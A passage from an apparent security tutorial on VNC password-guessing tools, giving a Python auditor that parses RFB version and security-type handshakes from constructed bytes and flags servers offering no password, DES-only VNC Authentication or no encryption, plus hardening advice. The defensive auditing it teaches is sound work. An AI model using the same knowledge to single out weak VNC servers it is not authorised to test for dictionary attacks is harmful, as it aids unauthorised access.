[Image: 8.png?w=687&ssl=1]
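All six tools in this section guess against the same thing: the security type a VNC server announces right after the RFB ProtocolVersion exchange that the Metasploit description mentions (versions 3.3, 3.7, 3.8 and RealVNC's 4.001). The parser below is an added example for this page, not code from Metasploit or any of the other tools; it decodes that handshake the way an auditor would when checking their own servers, reporting whether a server offers "None" (no password at all), only VNC Authentication (the 8-character DES challenge-response these dictionary attacks target, with no lockout defined by the protocol), or an encrypted type such as TLS or VeNCrypt. The handshake bytes are constructed rather than captured, and the parser assumes the 3.7-and-later list layout for every version other than 3.3.

```python
import struct

# Security types from the RFB specification (only the common ones are named).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_protocol_version(data):
    """Parse the 12-byte ProtocolVersion message 'RFB xxx.yyy\\n' into (major, minor)."""
    if len(data) < 12 or data[:4] != b"RFB " or data[7:8] != b"." or data[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    return int(data[4:7]), int(data[8:11])


def parse_server_security_types(version, data):
    """Return the security types the server announces after the version exchange.
    RFB 3.3: a single U32 type chosen by the server.
    RFB 3.7 and later: U8 count followed by that many U8 types; a count of 0
    means the server refused, and a U32 length plus reason string follows."""
    if version == (3, 3):
        return [struct.unpack(">I", data[:4])[0]]
    count = data[0]
    if count == 0:
        (length,) = struct.unpack(">I", data[1:5])
        raise ConnectionError(data[5:5 + length].decode("latin-1"))
    return list(data[1:1 + count])


def assess_vnc_handshake(version_bytes, security_bytes):
    """Turn a server's version + security announcement into audit findings."""
    version = parse_protocol_version(version_bytes)
    types = parse_server_security_types(version, security_bytes)
    findings = []
    if 1 in types:
        findings.append("offers security type None: anyone can connect without a password")
    if 2 in types:
        findings.append("offers VNC Authentication: password-only DES challenge-response, "
                        "password truncated to 8 characters, no lockout defined by the protocol")
    if not any(t in (18, 19) for t in types):
        findings.append("no TLS or VeNCrypt type offered: handshake and session are unencrypted")
    return {"version": "%d.%d" % version,
            "types": [SECURITY_TYPES.get(t, "type %d" % t) for t in types],
            "findings": findings}


# Constructed handshake bytes (not captured from a real server): an RFB 3.8
# server offering only VNC Authentication, and an RFB 3.3 server choosing None.
SERVER_38 = (b"RFB 003.008\n", b"\x01\x02")
SERVER_33 = (b"RFB 003.003\n", b"\x00\x00\x00\x01")

if __name__ == "__main__":
    for sample in (SERVER_38, SERVER_33):
        print(assess_vnc_handshake(*sample))
```

The practical use is to feed it the first two server messages of a VNC connection from your own inventory: any server that lists only type 2 is exactly what the hydra, medusa, ncrack and patator runs above succeed against, and the fix is to put the service behind SSH or a VNC build that offers TLS/VeNCrypt and to enforce failed-login throttling in the server itself, since the protocol provides none.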
